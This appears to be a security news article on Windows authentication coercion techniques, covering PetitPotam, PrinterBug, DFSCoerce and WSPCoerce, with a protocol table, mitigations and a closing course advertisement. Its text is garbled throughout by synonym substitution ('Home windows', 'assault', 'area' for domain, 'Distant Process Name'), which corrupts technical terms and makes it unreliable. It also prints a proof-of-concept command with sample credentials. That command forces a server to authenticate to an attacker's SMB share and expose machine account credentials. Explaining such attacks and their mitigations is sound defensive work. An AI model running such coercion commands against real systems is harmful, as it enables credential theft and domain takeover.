Authentication coercion stays a potent assault vector in Home windows environments, enabling attackers with even low-privileged area accounts to pressure focused programs, typically high-value servers or area controllers, to authenticate to attacker-controlled hosts.
This method is carefully tied to NTLM and Kerberos relay assaults, the place the coerced authentication session is intercepted and relayed to different providers, doubtlessly granting administrative entry or enabling lateral motion throughout the community.
The method usually includes leveraging Distant Process Name (RPC) interfaces obtainable on Home windows programs.
Attackers join to those interfaces and invoke particular features that immediate the goal to provoke an outbound authentication try.
The credentials—typically these of the machine account (e.g., DOMAINCOMPUTER$
)—are then captured or relayed.
That is particularly priceless as a result of laptop accounts may be abused for impersonation assaults, equivalent to S4U2Self and Useful resource-Primarily based Constrained Delegation (RBCD), in the end resulting in area escalation.
A number of coercion methods have emerged, every exploiting completely different Home windows RPC protocols.

The desk beneath summarizes the first strategies, their relevant protocols, and their capabilities in 2025 environments:
Technique | Protocol | SMB Succesful | HTTP Succesful | DCERPC Succesful | Accessible on Shoppers | Accessible on Servers |
---|---|---|---|---|---|---|
PrinterBug | MS-RPRN | ⭕* | ⭕* | ✅* | ✅ | ✅ |
PetitPotam | MS-EFSRPC | ✅ | ✅ | ❌ | ⭕** | ⭕** |
DFSCoerce | MS-DFSNM | ✅ | ❌ | ❌ | ❌ | ✅ |
WSPCoerce | MS-WSP | ✅ | ❌ | ❌ | ✅ | ⭕*** |
SMB/HTTP obtainable earlier than Home windows 11 22H2/Server 2025; DCERPC solely after
Service runs on demand
Service may be put in
PetitPotam (MS-EFSRPC):
This assault abuses the Encrypting File System Distant Protocol.
By invoking features like EfsRpcOpenFileRaw
, attackers pressure the goal to hook up with a specified SMB or HTTP endpoint, leaking credentials.
Instruments like Coercer automate the invention and exploitation of such RPC interfaces.
PrinterBug (MS-RPRN):
Exploits the Print System Distant Protocol, coercing authentication through print notification features.
Whereas newer Home windows variations restrict this to DCERPC, older programs nonetheless enable SMB/HTTP coercion, making it a flexible methodology.
DFSCoerce (MS-DFSNM):
Targets the Distributed File System Namespace Administration Protocol, obtainable on servers, to set off SMB-based authentication makes an attempt.
That is particularly related in environments with default NTLM configurations.
WSPCoerce (MS-WSP):
Abuses the Home windows Search Protocol, totally on workstations, to set off SMB authentication.
Latest analysis has produced Python implementations for cross-platform exploitation.
Pattern Coercion Code (MS-FSRVP):
python# Proof-of-concept for coercing authentication through MS-FSRVP
./coerce_poc.py -d "LAB.native" -u "user1" -p "Podalirius123!" 192.168.2.51 192.168.2.1
This command forces the Home windows Server at 192.168.2.1 to authenticate to the attacker’s SMB share at 192.168.2.51, exposing its machine account credentials.
Mitigations and the Future Outlook
Microsoft has responded to those threats by enabling mitigations equivalent to SMB and LDAP signing, channel binding, and Prolonged Safety for Authentication (EPA) by default in newer Home windows variations (Server 2025, Home windows 11 24H2).
These measures make relay assaults considerably more durable by requiring cryptographic validation of periods and messages.
Nevertheless, these protections are solely enabled by default on recent installations, and plenty of organizations nonetheless run older or upgraded programs with much less restrictive defaults.
Key Mitigation Methods:
- Disable NTLM Authentication: Microsoft is deprecating NTLM, and disabling it the place attainable eliminates many coercion assault paths.
- Allow SMB/LDAP Signing and Channel Binding: Implement signing and channel binding on all servers to forestall unauthorized relays.
- Monitor and Limit RPC Interfaces: Restrict entry to weak RPC interfaces and monitor for anomalous authentication makes an attempt.
As attackers and defenders proceed their arms race, understanding the technical particulars of authentication coercion stays vital for securing Home windows environments.
Whereas new mitigations increase the bar, legacy programs and incomplete configurations be certain that coercion methods will stay related for the foreseeable future.
To Improve Your Cybersecurity Expertise, Take Diamond Membership With 150+ Sensible Cybersecurity Programs On-line – Enroll Right here